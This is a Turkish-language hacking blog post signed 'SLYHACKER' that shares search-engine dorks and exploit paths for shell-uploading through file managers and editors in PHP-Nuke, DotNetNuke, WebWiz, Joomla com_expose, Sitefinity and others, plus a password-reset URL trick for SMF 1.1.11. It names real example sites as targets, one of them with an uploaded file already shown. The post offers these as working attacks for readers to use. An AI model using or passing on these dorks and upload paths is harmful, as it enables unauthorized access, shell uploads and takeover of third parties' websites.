Mesajlar Etiketlendi ‘en güncel açıklar’

PHPnuke MT 8.3.5 ckfinder Shell Upload

Google : inurl:”PHP-Nuke Project By PHPNuke.ir”

Eklenecek kod:
http://siteadresi.com/includes/ckfinder/ckfinder.html

Yüklendiği yer : /includes/ckfinder/files/dosyaniz.jpg

Evet kardeşlerim sizlere basit fakat hala güncel olan bir açığı paylaşmak istedim ve türkçe bir kaynak şuan bu konuyla ilgili olmadığı için paylaşmak istedim.
Ben size ufak bir denemeden sonra nasıl kullanacağınız konusunda sizi bilgilendireceğim.

Aramalarımızı ekleyeceğimiz kod üzerinden gideceğiz.Bir kaç tane ben size yazayım kalanını kendiniz geliştirebilirsiniz.

inurl:”/includes/ckfinder/ckfinder.html ”

inurl:”/includes/ckfinder/”

inurl:”/admin/includes/ckfinder/”

inurl:”/ckfinder/ckfinder.html”

örnek bir site : http://www.naturalchildbirthproject.com/admin/includes/ckfinder/ckfinder.html

dosya atılmış hali: http://www.naturalchildbirthproject.com/userfiles/files/logo.jpg

Herkese kolay gelsin selamlar..

SLYHACKER

EN GÜNCEL AÇIKLAR

inurl:”/admin/saveannounce_upload.asp”

inurl:”admin/eWebEditor/Upload.asp”

inurl:”UploadFile/upload.asp”

Dotnuke uplaod açıgı ;

inurl:/tabid/36/language/en-US/Default.aspx

Upload Sayfasi
Için; /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Upload Kod : javascript:__doPostBack(’ctlUR L$cmdUpload’,’’ ) bu kod tarayıcınızın adres bolumune adres cubuguna yanı yazıp enterlayınca upload ekrani gelir.
Mesela
inurl:tabid/1162/Default.aspx degişik şekillerde kod geliştirilebilir.

WEBWİZ ACİGİ (RTE UPLOAD ACIGI )

inurl:rte/my_documents/my_files/
inurl:/my_documents/my_files/
exloit: /rte/RTE_popup_file_atch.asp

Editör açıgı

inurl:editor/assetmanager/ (arama kodu geliştirilebilir)

EXPLOİT : /Editor/assetmanager/assetmanager.asp

Joomla upload açıgı

inurl index.php?option=com_expose

Exploit: administrator/components/com_expose/uploadimg.php
Uploadin gittigi yer : /components/com_expose/expose/img/

Sitefinity: Login upload açıgı

inurl:”Sitefinity: Login”
exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx

SMF 1.1.11 açıgı

inurl:SMF 1.1.11
Exploit : http://siteadi.com/index.php?action=reminder;sa=setpassword;u=1;code=0eb3d1f811

örnek site :
http://modxcms.com/forums/index.php?action=reminder;sa=setpassword;u=1;code=0eb3d1f811

Kolay gelsin selametle.. SLYHACKER